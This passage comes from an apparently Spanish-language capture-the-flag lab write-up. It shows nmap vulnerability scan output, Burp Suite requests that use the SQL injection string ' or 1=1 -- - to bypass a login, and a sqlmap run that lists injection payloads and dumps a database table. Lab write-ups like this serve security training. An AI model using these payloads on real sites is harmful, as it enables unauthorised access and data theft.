| FCAF01A0-F921-5DB1-BBC5-850EC2DC5C46 4.3 https://vulners.com/githubexploit/FCAF01A0-F921-5DB1-BBC5-850EC2DC5C46 *EXPLOIT*
| EDB-ID:50383 4.3 https://vulners.com/exploitdb/EDB-ID:50383 *EXPLOIT*
| E7B177F6-FA62-52FE-A108-4B8FC8112B7F 4.3 https://vulners.com/githubexploit/E7B177F6-FA62-52FE-A108-4B8FC8112B7F *EXPLOIT*
| E6B39247-8016-5007-B505-699F05FCA1B5 4.3 https://vulners.com/githubexploit/E6B39247-8016-5007-B505-699F05FCA1B5 *EXPLOIT*
| DBF996C3-DC2A-5859-B767-6B2FC38F2185 4.3 https://vulners.com/githubexploit/DBF996C3-DC2A-5859-B767-6B2FC38F2185 *EXPLOIT*
| D0E79214-C9E8-52BD-BC24-093970F5F34E 4.3 https://vulners.com/githubexploit/D0E79214-C9E8-52BD-BC24-093970F5F34E *EXPLOIT*
| CVE-2020-11985 4.3 https://vulners.com/cve/CVE-2020-11985
| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
| CVE-2018-1302 4.3 https://vulners.com/cve/CVE-2018-1302
| CVE-2018-1301 4.3 https://vulners.com/cve/CVE-2018-1301
| CVE-2018-11763 4.3 https://vulners.com/cve/CVE-2018-11763
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2016-1546 4.3 https://vulners.com/cve/CVE-2016-1546
| CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE 4.3 https://vulners.com/githubexploit/CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE *EXPLOIT*
| CD48BD40-E52A-5A8B-AE27-B57C358BB0EE 4.3 https://vulners.com/githubexploit/CD48BD40-E52A-5A8B-AE27-B57C358BB0EE *EXPLOIT*
| C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79 4.3 https://vulners.com/githubexploit/C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79 *EXPLOIT*
| C8799CA3-C88C-5B39-B291-2895BE0D9133 4.3 https://vulners.com/githubexploit/C8799CA3-C88C-5B39-B291-2895BE0D9133 *EXPLOIT*
| C0380E16-C468-5540-A427-7FE34E7CF36B 4.3 https://vulners.com/githubexploit/C0380E16-C468-5540-A427-7FE34E7CF36B *EXPLOIT*
| BC027F41-02AD-5D71-A452-4DD62B0F1EE1 4.3 https://vulners.com/githubexploit/BC027F41-02AD-5D71-A452-4DD62B0F1EE1 *EXPLOIT*
| B946B2A1-2914-537A-BF26-94B48FC501B3 4.3 https://vulners.com/githubexploit/B946B2A1-2914-537A-BF26-94B48FC501B3 *EXPLOIT*
| B9151905-5395-5622-B789-E16B88F30C71 4.3 https://vulners.com/githubexploit/B9151905-5395-5622-B789-E16B88F30C71 *EXPLOIT*
| B58E6202-6D04-5CB0-8529-59713C0E13B8 4.3 https://vulners.com/githubexploit/B58E6202-6D04-5CB0-8529-59713C0E13B8 *EXPLOIT*
| B53D7077-1A2B-5640-9581-0196F6138301 4.3 https://vulners.com/githubexploit/B53D7077-1A2B-5640-9581-0196F6138301 *EXPLOIT*
| A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F 4.3 https://vulners.com/githubexploit/A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F *EXPLOIT*
| 9EE3F7E3-70E6-503E-9929-67FE3F3735A2 4.3 https://vulners.com/githubexploit/9EE3F7E3-70E6-503E-9929-67FE3F3735A2 *EXPLOIT*
| 9D511461-7D24-5402-8E2A-58364D6E758F 4.3 https://vulners.com/githubexploit/9D511461-7D24-5402-8E2A-58364D6E758F *EXPLOIT*
| 9CEA663C-6236-5F45-B207-A873B971F988 4.3 https://vulners.com/githubexploit/9CEA663C-6236-5F45-B207-A873B971F988 *EXPLOIT*
| 987C6FDB-3E70-5FF5-AB5B-D50065D27594 4.3 https://vulners.com/githubexploit/987C6FDB-3E70-5FF5-AB5B-D50065D27594 *EXPLOIT*
| 789B6112-E84C-566E-89A7-82CC108EFCD9 4.3 https://vulners.com/githubexploit/789B6112-E84C-566E-89A7-82CC108EFCD9 *EXPLOIT*
| 788F7DF8-01F3-5D13-9B3E-E4AA692153E6 4.3 https://vulners.com/githubexploit/788F7DF8-01F3-5D13-9B3E-E4AA692153E6 *EXPLOIT*
| 749F952B-3ACF-56B2-809D-D66E756BE839 4.3 https://vulners.com/githubexploit/749F952B-3ACF-56B2-809D-D66E756BE839 *EXPLOIT*
| 6E484197-456B-55DF-8D51-C2BB4925F45C 4.3 https://vulners.com/githubexploit/6E484197-456B-55DF-8D51-C2BB4925F45C *EXPLOIT*
| 68E78C64-D93A-5E8B-9DEA-4A8D826B474E 4.3 https://vulners.com/githubexploit/68E78C64-D93A-5E8B-9DEA-4A8D826B474E *EXPLOIT*
| 6758CFA9-271A-5E99-A590-E51F4E0C5046 4.3 https://vulners.com/githubexploit/6758CFA9-271A-5E99-A590-E51F4E0C5046 *EXPLOIT*
| 674BA200-C494-57E6-B1B4-1672DDA15D3C 4.3 https://vulners.com/githubexploit/674BA200-C494-57E6-B1B4-1672DDA15D3C *EXPLOIT*
| 5A54F5DA-F9C1-508B-AD2D-3E45CD647D31 4.3 https://vulners.com/githubexploit/5A54F5DA-F9C1-508B-AD2D-3E45CD647D31 *EXPLOIT*
| 4E5A5BA8-3BAF-57F0-B71A-F04B4D066E4F 4.3 https://vulners.com/githubexploit/4E5A5BA8-3BAF-57F0-B71A-F04B4D066E4F *EXPLOIT*
| 4C79D8E5-D595-5460-AA84-18D4CB93E8FC 4.3 https://vulners.com/githubexploit/4C79D8E5-D595-5460-AA84-18D4CB93E8FC *EXPLOIT*
| 4B44115D-85A3-5E62-B9A8-5F336C24673F 4.3 https://vulners.com/githubexploit/4B44115D-85A3-5E62-B9A8-5F336C24673F *EXPLOIT*
| 4013EC74-B3C1-5D95-938A-54197A58586D 4.3 https://vulners.com/githubexploit/4013EC74-B3C1-5D95-938A-54197A58586D *EXPLOIT*
| 3CF66144-235E-5F7A-B889-113C11ABF150 4.3 https://vulners.com/githubexploit/3CF66144-235E-5F7A-B889-113C11ABF150 *EXPLOIT*
| 379FCF38-0B4A-52EC-BE3E-408A0467BF20 4.3 https://vulners.com/githubexploit/379FCF38-0B4A-52EC-BE3E-408A0467BF20 *EXPLOIT*
| 365CD0B0-D956-59D6-9500-965BF4017E2D 4.3 https://vulners.com/githubexploit/365CD0B0-D956-59D6-9500-965BF4017E2D *EXPLOIT*
| 2E98EA81-24D1-5D5B-80B9-A8D616BF3C3F 4.3 https://vulners.com/githubexploit/2E98EA81-24D1-5D5B-80B9-A8D616BF3C3F *EXPLOIT*
| 2B4FEB27-377B-557B-AE46-66D677D5DA1C 4.3 https://vulners.com/githubexploit/2B4FEB27-377B-557B-AE46-66D677D5DA1C *EXPLOIT*
| 1B75F2E2-5B30-58FA-98A4-501B91327D7F 4.3 https://vulners.com/githubexploit/1B75F2E2-5B30-58FA-98A4-501B91327D7F *EXPLOIT*
| 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 *EXPLOIT*
| 1337DAY-ID-33575 4.3 https://vulners.com/zdt/1337DAY-ID-33575 *EXPLOIT*
| 1145F3D1-0ECB-55AA-B25D-A26892116505 4.3 https://vulners.com/githubexploit/1145F3D1-0ECB-55AA-B25D-A26892116505 *EXPLOIT*
| 108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2 4.3 https://vulners.com/githubexploit/108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2 *EXPLOIT*
| 0BC014D0-F944-5E78-B5FA-146A8E5D0F8A 4.3 https://vulners.com/githubexploit/0BC014D0-F944-5E78-B5FA-146A8E5D0F8A *EXPLOIT*
| 06076ECD-3FB7-53EC-8572-ABBB20029812 4.3 https://vulners.com/githubexploit/06076ECD-3FB7-53EC-8572-ABBB20029812 *EXPLOIT*
| 05403438-4985-5E78-A702-784E03F724D4 4.3 https://vulners.com/githubexploit/05403438-4985-5E78-A702-784E03F724D4 *EXPLOIT*
| 00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08 4.3 https://vulners.com/githubexploit/00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08 *EXPLOIT*
| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
| CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
| CVE-2023-45802 2.6 https://vulners.com/cve/CVE-2023-45802
| OSV:BIT-APACHE-2020-13938 2.1 https://vulners.com/osv/OSV:BIT-APACHE-2020-13938
|_ PACKETSTORM:152441 0.0 https://vulners.com/packetstorm/PACKETSTORM:152441 *EXPLOIT*
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.1.1
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=ip-10-10-125-35.eu-west-1.compute.internal
| Found the following possible CSRF vulnerabilities:
|
| Path: http://ip-10-10-125-35.eu-west-1.compute.internal:80/
| Form id: field_username
| Form action: index.php
|
| Path: http://ip-10-10-125-35.eu-west-1.compute.internal:80/
| Form id:
| Form action: #
|
| Path: http://ip-10-10-125-35.eu-west-1.compute.internal:80/index.php
| Form id: field_username
| Form action: index.php
|
| Path: http://ip-10-10-125-35.eu-west-1.compute.internal:80/index.php
| Form id:
|_ Form action: #
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_ /images/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
MAC Address: 02:9D:BB:4A:83:77 (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.10 - 3.13
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 330.48 seconds
-------------- BURPSUITE
HACEMOS UN ANALISIS CON BURPSUITE DE LAS REQUEST ALA HORA DE INICIAR SESION PARA TENER UN PANORAMA DE LAS CONSULTAS Y RESPONSE DEL LADO DEL SERVIDOR:
POST /index.php HTTP/1.1
Host: 10.10.125.35
Content-Length: 39
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.125.35
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.125.35/
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Cookie: PHPSESSID=dhih54edbckjubvee8l2p7je23
Connection: close
username=P4IM0N&password=12345&x=27&y=5
SEGUIMOS PROBANDO EN BURPSUITE CON UN NOMBRE DE USARIO CUALQUIERA Y HACIENDO UNA INYECCION BASICA EN EL CAMPO DE PASSWOR :
REQUEST:
POST /index.php HTTP/1.1
Host: 10.10.125.35
Content-Length: 47
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.125.35
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.125.35/
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Cookie: PHPSESSID=dhih54edbckjubvee8l2p7je23
Connection: close
username=P4IM0N&password=' or 1=1 -- -&x=27&y=5
RESPONSE:
HTTP/1.1 200 OK
Date: Tue, 30 Jan 2024 23:25:53 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4517
Connection: close
Content-Type: text/html; charset=UTF-8
Incorrect login
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1
.................
SEGUIMOS PROBANDO EN BURPSUITE CON UN NOMBRE DE USARIO CUALQUIERA Y HACIENDO UNA INYECCION BASICA EN EL CAMPO DE PUSERNAME Y BINGO CREOP QUE NOS DEJO ENTRAR CON NUESTRO USUARIO CUALQUIERA Y NOS REDIRIGIO:
REQUEST:
POST /index.php HTTP/1.1
Host: 10.10.125.35
Content-Length: 41
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.125.35
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.125.35/
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Cookie: PHPSESSID=dhih54edbckjubvee8l2p7je23
Connection: close
username=' or 1=1 -- -&password=&x=27&y=5
RESPONSE:
HTTP/1.1 302 Found
Date: Tue, 30 Jan 2024 23:28:08 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: portal.php
Content-Length: 4502
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1
HTTP/1.1 200 OK
Date: Tue, 30 Jan 2024 23:30:09 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 726
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<head>
<title>Game Zone Portal</title>
<link rel="stylesheet" href="style.css" type="text/css" media="screen" />
</head>
<body>
<center>
<h1>Game Zone Portal</h1><br />
<table class="response">
<form method="POST" autocomplete="off">
<tr>
<td>
Search for a game review:
</td>
<td>
<input type="text" id="searchitem" name="searchitem">
</td>
<td>
<input type="submit" value="Search!"/>
</td>
</tr>
</table>
</p>
</form>
<div class="searchheader" style="color:white">
<table>
<tr>
<td style="width:200px">
<b>Title</b>
</td>
<td style="width:450px">
<b>Review</b>
</td>
</tr>
</table>
</div>
</body>
</html>
PROBAMOS AHORA LÑO MISMO PERO ON UN POSIBLE USUARIO VALIDO COMO ADMIN Y VEMOS QUE PASA:
REQUEST:
POST /index.php HTTP/1.1
Host: 10.10.125.35
Content-Length: 50
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.125.35
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.125.35/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Cookie: PHPSESSID=dhih54edbckjubvee8l2p7je23
Connection: close
username=admin&password=%27+or+1%3D1+--+-&x=23&y=7
PROBAMOS SOBRE EL USER:
POST /index.php HTTP/1.1
Host: 10.10.125.35
Content-Length: 55
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.125.35
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.125.35/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Cookie: PHPSESSID=dhih54edbckjubvee8l2p7je23
Connection: close
username=admin%27+or+1%3D1+--+-&password=12324&x=14&y=8
GET /portal.php HTTP/1.1
Host: 10.10.125.35
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.125.35/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Cookie: PHPSESSID=dhih54edbckjubvee8l2p7je23
Connection: close
BINGO SE TENZO, PROBAMOS E NUEVO CON REPITER SDE BURPSUITE Y NOS ENTRO A UN PANEL DE LOGIN DE BUSQUEDA DE PELICULAS:
REQUEST Y REDIRECCION:
POST /index.php HTTP/1.1
Host: 10.10.125.35
Content-Length: 50
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.125.35
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.125.35/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Cookie: PHPSESSID=dhih54edbckjubvee8l2p7je23
Connection: close
username=admin' or 1=1 -- -&password=1234&x=23&y=7
GET /portal.php HTTP/1.1
Host: 10.10.125.35
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.125.35/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Cookie: PHPSESSID=dhih54edbckjubvee8l2p7je23
Connection: close
RESPONSE y UNA REDIRECION AL PANEL:
HTTP/1.1 302 Found
Date: Tue, 30 Jan 2024 23:39:10 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: portal.php
Content-Length: 4502
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1
..............
HTTP/1.1 200 OK
Date: Tue, 30 Jan 2024 23:39:24 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 726
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<head>
<title>Game Zone Portal</title>
<link rel="stylesheet" href="style.css" type="text/css" media="screen" />
</head>
<body>
<center>
<h1>Game Zone Portal</h1><br />
<table class="response">
<form method="POST" autocomplete="off">
<tr>
<td>
Search for a game review:
</td>
<td>
<input type="text" id="searchitem" name="searchitem">
</td>
<td>
<input type="submit" value="Search!"/>
</td>
</tr>
</table>
</p>
</form>
<div class="searchheader" style="color:white">
<table>
<tr>
<td style="width:200px">
<b>Title</b>
</td>
<td style="width:450px">
<b>Review</b>
</td>
</tr>
</table>
</div>
</body>
</html>
Y PUDIMOS BUSCAR INFO E UNA PELI EN EL PANEL EN LA WEB:
Game Zone Portal
Search for a game review:
Title Review
Hitman 2 Hitman 2 doesnt add much of note to the structure of its predecessor and thus feels more like Hitman 1.5 than a full-blown sequel. But thats not a bad thing.
INTERSEPTAMOS LAS SOLICTUDES DE LA FUNCION SEARCH PARA VER COMO TRABAJAN ALS REQUEST Y RESPONSE:
REQUEST:
POST /portal.php HTTP/1.1
Host: 10.10.125.35
Content-Length: 17
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.125.35
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.125.35/portal.php
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Cookie: PHPSESSID=dhih54edbckjubvee8l2p7je23
Connection: close
searchitem=hitman
RESPONSE:
HTTP/1.1 200 OK
Date: Tue, 30 Jan 2024 23:50:35 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 953
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<head>
<title>Game Zone Portal</title>
<link rel="stylesheet" href="style.css" type="text/css" media="screen" />
</head>
<body>
<center>
<h1>Game Zone Portal</h1><br />
<table class="response">
<form method="POST" autocomplete="off">
<tr>
<td>
Search for a game review:
</td>
<td>
<input type="text" id="searchitem" name="searchitem">
</td>
<td>
<input type="submit" value="Search!"/>
</td>
</tr>
</table>
</p>
</form>
<div class="searchheader" style="color:white">
<table>
<tr>
<td style="width:200px">
<b>Title</b>
</td>
<td style="width:450px">
<b>Review</b>
</td>
</tr>
<tr><td style="width:200px">Hitman 2</td><td style="width:450px">Hitman 2 doesnt add much of note to the structure of its predecessor and thus feels more like Hitman 1.5 than a full-blown sequel. But thats not a bad thing.</td></table>
</div>
</body>
</html>
------------------- SLQMAP
CON LOS DATOS DE LA CONSULTA REQUEST QUE CAPTURAMOS CON BUPSUITE A LA HORA DE USAR LA FUNCION DE BUSCAR PELICULAS EN NUESTRO PANEL YA LOGEADOS POR LA INYECCION QUE PROBAMOS ANTES; AHORA ESSTA ULTIMA CONSULTA LÑA GUARDAREMOS EN UN .TXT Y LA USAREMOS CON SQLMAP PARA TRATAR DE BUSCAR VULNERABILIDAD Y CON __DUMP TARATAR DE ARMAR UNA LABLA DE LA BASE DE DATOS VULNERABEL:
┌──(root㉿kali)-[~]
└─# sqlmap -r requestsearch.txt --dbms=mysql --dump
___
__H__
___ ___["]_____ ___ ___ {1.6.10#stable}
|_ -| . [,] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:57:55 /2024-01-30/
[23:57:55] [INFO] parsing HTTP request from 'requestsearch.txt'
[23:57:57] [INFO] testing connection to the target URL
[23:57:57] [INFO] checking if the target is protected by some kind of WAF/IPS
[23:57:57] [INFO] testing if the target URL content is stable
[23:57:57] [INFO] target URL content is stable
[23:57:57] [INFO] testing if POST parameter 'searchitem' is dynamic
[23:57:57] [INFO] POST parameter 'searchitem' appears to be dynamic
[23:57:57] [INFO] heuristic (basic) test shows that POST parameter 'searchitem' might be injectable (possible DBMS: 'MySQL')
[23:57:57] [INFO] heuristic (XSS) test shows that POST parameter 'searchitem' might be vulnerable to cross-site scripting (XSS) attacks
[23:57:57] [INFO] testing for SQL injection on POST parameter 'searchitem'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[23:59:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:59:29] [WARNING] reflective value(s) found and filtering out
[23:59:29] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[23:59:29] [INFO] testing 'Generic inline queries'
[23:59:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[23:59:29] [INFO] POST parameter 'searchitem' appears to be 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable (with --string="not")
[23:59:29] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[23:59:29] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[23:59:29] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[23:59:29] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[23:59:29] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[23:59:29] [INFO] POST parameter 'searchitem' is 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' injectable
[23:59:29] [INFO] testing 'MySQL inline queries'
[23:59:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[23:59:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[23:59:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[23:59:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[23:59:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[23:59:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[23:59:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[23:59:39] [INFO] POST parameter 'searchitem' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[23:59:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:59:39] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[23:59:39] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[23:59:39] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[23:59:39] [INFO] target URL appears to have 3 columns in query
[23:59:39] [INFO] POST parameter 'searchitem' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'searchitem' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: searchitem (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: searchitem=hitman%' AND 5050=5050#
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: searchitem=hitman%' AND GTID_SUBSET(CONCAT(0x716a706271,(SELECT (ELT(9106=9106,1))),0x7176716a71),9106) AND 'fGyw%'='fGyw
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: searchitem=hitman%' AND (SELECT 1949 FROM (SELECT(SLEEP(5)))KSbe) AND 'FKVI%'='FKVI
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: searchitem=hitman%' UNION ALL SELECT NULL,NULL,CONCAT(0x716a706271,0x65764443656343714f465170737a645670747a6677504f4243565a4353756b6e7a4651547a6b706c,0x7176716a71)#
---
[00:01:26] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.6
[00:01:26] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[00:01:26] [INFO] fetching current database
[00:01:26] [INFO] fetching tables for database: 'db'
[00:01:26] [INFO] fetching columns for table 'post' in database 'db'
[00:01:26] [INFO] fetching entries for table 'post' in database 'db'
Database: db
Table: post
[5 entries]
+----+--------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id | name | description |
+----+--------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1 | Mortal Kombat 11 | Its a rare fighting game that hits just about every note as strongly as Mortal Kombat 11 does. Everything from its methodical and deep combat. |
| 2 | Marvel Ultimate Alliance 3 | Switch owners will find plenty of content to chew through, particularly with friends, and while it may be the gaming equivalent to a Hulk Smash, that isnt to say that it isnt a rollicking good time. |
| 3 | SWBF2 2005 | Best game ever |
| 4 | Hitman 2 | Hitman 2 doesnt add much of note to the structure of its predecessor and thus feels more like Hitman 1.5 than a full-blown sequel. But thats not a bad thing. |
